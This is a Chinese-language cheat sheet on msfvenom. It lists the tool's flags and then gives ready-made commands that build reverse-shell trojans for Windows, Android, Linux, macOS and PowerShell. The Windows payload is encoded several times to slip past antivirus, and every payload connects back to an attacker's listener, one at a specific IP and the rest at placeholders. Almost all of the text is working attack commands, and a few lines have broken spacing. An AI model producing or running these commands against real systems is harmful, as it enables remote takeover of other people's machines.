原理:msfvenom是msfpayload、msfencode的結合體,利用msfvenom生成木馬程序,並在目標機上執行,在本地監聽上線
使用說明:
-p, --payload 使用指定的payload
-l, --list [module_type] 列出指定模塊可用的payloads,包括payloads、encoders、nops、all
-n, --nopsled 為payload指定一個 nopsled 長度
-f, --format 指定輸出格式,如exe等
-e, --encoder 使用編碼器
-a, --arch 指定payload構架(x86、x64)
--platform 指定payload平台
-s, --space 指定payload攻擊荷載的最大長度
-b, --bad-chars 指定規避字符集,如: '\x00\xff‘
-i, --iterations 指定編碼次數
-c, --add-code 指定一個附加的win32 shellcode 文件
-x, --template 指定一個可執行文件作為模板
-k, --keep payload自動分離並注入到新的進程
-o, --out 保存生成的payload
-v, --var-name 指定自定義變量
-h, --help 顯示幫助文件
一、查看msfvenom支持的payload msfvenom --list payload
二、查看msfvenom支持的平台 msfvenom --list platforms
三、查看msfvenom支持的編碼格式 msfvenom --list encoders 其他的也是同理
使用Metaspoilt生成木馬
msfvenom -a x64 --platform windows -p windows/meterpreter/reverse_tcp
LHOST=192.168.30.133 LPORT=12345 - e x86/shikata_ga_nai -b '\x00\xff' -i 3 -f exe -o chen.exe
msfvenom -p android/meterpreter/reverse_tcp LHOST= =<攻擊機IP> LPORT==<攻擊機端口> -o
mm.apk
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=<攻擊機IP>
LPORT=<攻擊機端口> -
f elf -o payload.elf
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=<攻擊機IP> LPORT=<攻擊機
端口> -f macho - o payload.macho
msfvenom -a x86 --platform windows -p windows/powershell_reverse_tcp LHOST=<攻擊機IP>
LPORT=<攻擊機端口> -e
cmd/powershell_base64 -i 3 -f raw -o payload.ps1